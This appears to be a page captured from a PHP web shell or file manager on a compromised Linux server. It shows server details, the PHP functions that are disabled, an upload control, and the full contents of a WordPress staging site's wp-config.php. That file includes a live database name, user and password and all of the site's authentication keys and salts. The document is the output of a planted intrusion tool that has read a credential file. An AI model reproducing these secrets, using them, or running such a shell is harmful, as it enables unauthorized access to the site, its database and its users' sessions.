HEX
Server: nginx/1.27.1
System: Linux in-4 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64
User: ilikadirect (1186)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v6964/foodfactor-staging-wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'foodfactor-stagingdb' );

/** MySQL database username */
define( 'DB_USER', 'foodfactor-stagingdbuser' );

/** MySQL database password */
define( 'DB_PASSWORD', '3R6i0e5gkDu19jwOhs' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',          '04ih3yF`nd5A`.;FE]M%1weJuB Uc)~%2;hx=V$oJ)DLD,c9DbpgB5t5W8DDL*f=' );
define( 'SECURE_AUTH_KEY',   'HWE)dElWC#ZY:lyhPUeB=<)OYQvfe^$(NjTU=Jr9*Zvk<WRPf}<^W$*m}SB16:88' );
define( 'LOGGED_IN_KEY',     '[*>q4k]oZG?S]j7KG9GA<>E: +[!3oa.aFfqm|!3O}U0o.]ygIcZYAQ3fkJB9R2/' );
define( 'NONCE_KEY',         'u5SW|Q4GpGz5}xzIAMWzEhl_5F)]8&K9 qcGF+5c&ks&i%!&%v2!Tc, H>U{6C1%' );
define( 'AUTH_SALT',         'E.:-<^Mwox/swgc3C-]v8D<h_4!k%m)NvJP~CmLU[O9U/SwuNLt#T.Skm)LJR@IY' );
define( 'SECURE_AUTH_SALT',  '@8ftB&M-g)PS?tL{x`2p4oy[kT8:(o86$JWoPa?DWP8O%JLrl|1t=x+KS/?T/&8Z' );
define( 'LOGGED_IN_SALT',    'pbi].#%^oUfz|+7>1~pYd&1TGl0dW)6hEUw8;=c95lD`ka?1_q<]IbMg 0>%HyH+' );
define( 'NONCE_SALT',        'exDI+zo.(*b2-:!)W*1jIVV)2h%3aYt*@7lGsVZk#V0Z?.1!>!@^ZTf|y@xe$eCm' );
define( 'WP_CACHE_KEY_SALT', '*+T!-~}.J k}d3bDO>:U4Zl2FpNL~<Z1RlS?qxF4J`;2V@M!m@InXSE()yuc9qo$' );

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';




define( 'FS_METHOD', 'direct' );
define( 'WP_MEMORY_LIMIT', '256M' );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';